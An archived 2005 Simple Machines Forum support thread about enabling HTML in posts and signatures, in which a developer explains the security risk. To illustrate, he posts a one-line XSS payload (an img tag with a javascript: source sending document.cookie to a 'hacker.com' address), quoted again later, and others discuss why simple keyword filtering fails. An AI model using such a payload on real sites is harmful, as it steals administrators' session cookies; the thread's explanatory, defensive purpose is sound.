News:

SMF 2.1.6 has been released! Take it for a spin! Read more.

Main Menu

HTML Code in Posts and Signatures

Started by maufonseca, March 14, 2005, 06:57:50 PM

Previous topic - Next topic
Print
Go Down Pages1
User actions

maufonseca

March 14, 2005, 06:57:50 PM
Is there a way to enable html code in Posts and Signatures?

[Unknown]

#1
March 14, 2005, 07:18:39 PM
No... and if you like your administrator account's current password, you'll probably want to keep it that way.

-[Unknown]

Ben_S

#2
March 14, 2005, 07:53:59 PM
Although there is a safe html option in Edit Features and Options, but the tags are limited for the reasons [Unknown] pointed out.
Liverpool FC Forum with 14 million+ posts.

maufonseca

#3
March 14, 2005, 07:59:42 PM
Quote from: [Unknown] on March 14, 2005, 07:18:39 PM
No... and if you like your administrator account's current password, you'll probably want to keep it that way.

-[Unknown]
What happends when you use HTML code?

[Unknown]

#4
March 15, 2005, 03:51:10 AM
<img src="javascript:'http://www.hacker.com/look_for_admin_cookie.php?'; + document.cookie;" />

-[Unknown]

maufonseca

#5
March 15, 2005, 10:54:22 PM
Ohh, I understand now. its easyer to hack your site

Spamiam

#6
June 17, 2005, 06:10:48 PM
I very much understand disallowing java and applets, but I fail to see how the vast majority of html tags pose any threat. Pretty much all boards have liberal html functions built in, obviously sans things like java and applets.

This is the only disappointment I've had with this package so far, as have my members.

At least a package for trusted members would be appropriate. Many of my members have been html authors for about a century now. ;)

Gary

#7
June 17, 2005, 06:17:00 PM
You can turn on and off basic HTML which allows images and links or as I call them Here Refs and Img Sarks.

Admin > Features and Options,

though I think its not a good idea to turn it on.
Gary M. Gadsdon
Do NOT PM me unless I say so
War of the Simpsons
Bongo Comics Fan Forum
Youtube Let's Plays
^ YT is changing monetisation policy, help reach 1000 sub threshold.

Spamiam

#9
June 17, 2005, 07:37:22 PM
 :D I *did* have it on - but it's so limited that nobody noticed!  ;D

Yonkey

#10
June 30, 2005, 12:57:30 PM
Quote from: [Unknown] on March 15, 2005, 03:51:10 AM
<img src="javascript:'http://www.hacker.com/look_for_admin_cookie.php?'; + document.cookie;" />

-[Unknown]
Why can't SMF just str_replace($HTMLtext,"javascript:", "noJavaScriptAllowed...Punk:") ? :P

Ben_S

#11
June 30, 2005, 01:27:27 PM
Because that would be easy to get round.
Liverpool FC Forum with 14 million+ posts.

Sheepy

#12
June 30, 2005, 07:41:05 PM
Quote from: Spamiam on June 17, 2005, 07:37:22 PM
:D I *did* have it on - but it's so limited that nobody noticed!  ;D
I made a mod (More HTML Tags) that expand the tag list, but it's still limited to tags without attributes.  It include things like list, header, abbreviation, center, etc.  More complicated tags will result in easier security breach, which is a focus of 1.0.5... You need to compromise some of the time.

Yonkey

#13
June 30, 2005, 08:06:16 PM
Quote from: Ben_S on June 30, 2005, 01:27:27 PM
Because that would be easy to get round.
How?  As far as I know, you can't run any javascript without the word "javascript:" in an href or src.  You could also disable use of the <script> tag.

[Unknown]

#14
June 30, 2005, 08:57:28 PM
Because IE will try to parse completely invalid HTML.  It goes *out of its way* to try to make things that aren't otherwise insecure insecure.

For example, this was exactly what happened with 1.0.4: the bbc code that caused the problem triggered invalid HTML, which IE decided to try so hard to parse it got a security hole involved.  Firefox was completely unaffected.

It's a losing game to fight an engine designed to allow even the most obvious of mistakes - especially if they ever improve its heuristics.

-[Unknown]

Elijah Bliss

#15
June 30, 2005, 09:02:59 PM
Quote from: [Unknown] on June 30, 2005, 08:57:28 PM
Because IE will try to parse completely invalid HTML.  It goes *out of its way* to try to make things that aren't otherwise insecure insecure.

For example, this was exactly what happened with 1.0.4: the bbc code that caused the problem triggered invalid HTML, which IE decided to try so hard to parse it got a security hole involved.  Firefox was completely unaffected.

It's a losing game to fight an engine designed to allow even the most obvious of mistakes - especially if they ever improve its heuristics.

-[Unknown]

Wow.

On a side note, is there a way to disallow Flash in signatures?

[Unknown]

#16
June 30, 2005, 09:09:19 PM
Just in signatures?

.signature embed, .signature object
{
   display: none;
}

-[Unknown]

Yonkey

#17
June 30, 2005, 09:13:28 PM Last Edit: June 30, 2005, 09:15:12 PM by Yonkey
Quote from: [Unknown] on June 30, 2005, 08:57:28 PM
Because IE will try to parse completely invalid HTML.  It goes *out of its way* to try to make things that aren't otherwise insecure insecure.

Yikes. :o It must be because back when IE 4/5 was being developed, they wanted a browser that would try to recover from HTML tag errors as opposed to rejecting them completely and barfing up a page (or crashing :P).  As a result, you get IE trying to parse anything, leading to obvious security holes. :-\

Anyway, personally I don't like using html in my forum and almost everything you could ever want to do visually is already possible using BBC tags. :)

Elijah Bliss

#18
June 30, 2005, 09:14:28 PM
Quote from: [Unknown] on June 30, 2005, 09:09:19 PM
Just in signatures?

.signature embed, .signature object
{
   display: none;
}

-[Unknown]

Excellent! thanks!
Print
Go Up Pages1
User actions
Advertisement: